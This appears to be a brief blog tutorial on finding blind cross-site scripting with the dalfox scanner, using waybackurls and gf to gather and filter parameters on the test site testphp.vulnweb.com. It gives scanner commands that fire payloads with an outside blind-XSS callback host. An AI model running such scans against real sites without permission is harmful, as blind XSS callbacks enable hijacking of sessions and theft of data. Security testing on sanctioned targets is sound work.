You are currently viewing How To Find Blind Xss using dalfox | (dalfox #2)

How To Find Blind Xss using dalfox | (dalfox #2)

Hello all

I am back with another blog on xss let’s talk about blind xss and how we can found it using dalfox tool i have already created a blog on dalfox so go and checkout : https://www.hacktube5.tech/uncategorized/how-to-find-cross-site-scripting-xss-using-dalfox/

So let’s start:

We need a url to test blind xss so let’s take this : http://testphp.vulnweb.com/

So let’s find some url of this site so type a command in your terminal : waybackurls http://testphp.vulnweb.com | tee testurl.txt

Now just hit <ENTER> it will found some urls

So we have a file which is testurl.txt so let’s find some parameters to find to test xss for that use GF tool which is on github : https://github.com/tomnomnom/gf

And command is : cat testurl.txt | gf xss >> testxss.txt

hit <ENTER> it will gives you some parameter to test xss

So Now this to fire dalfox.

Just type a command : dalfox file
testxss.txt pipe -b https://hacktube.xss.ht -F

Hit <ENTER> and see the response

If you want to send this request to your burpsuite for manual testing so use this payload :

dalfox file testxss.txt pipe -b https://hacktube.xss.ht -F –proxy http://127.0.0.1:8080

 

Go Your burpsuite check http history and see all request are there you can test them manual
Thanks For Reading

Leave a Reply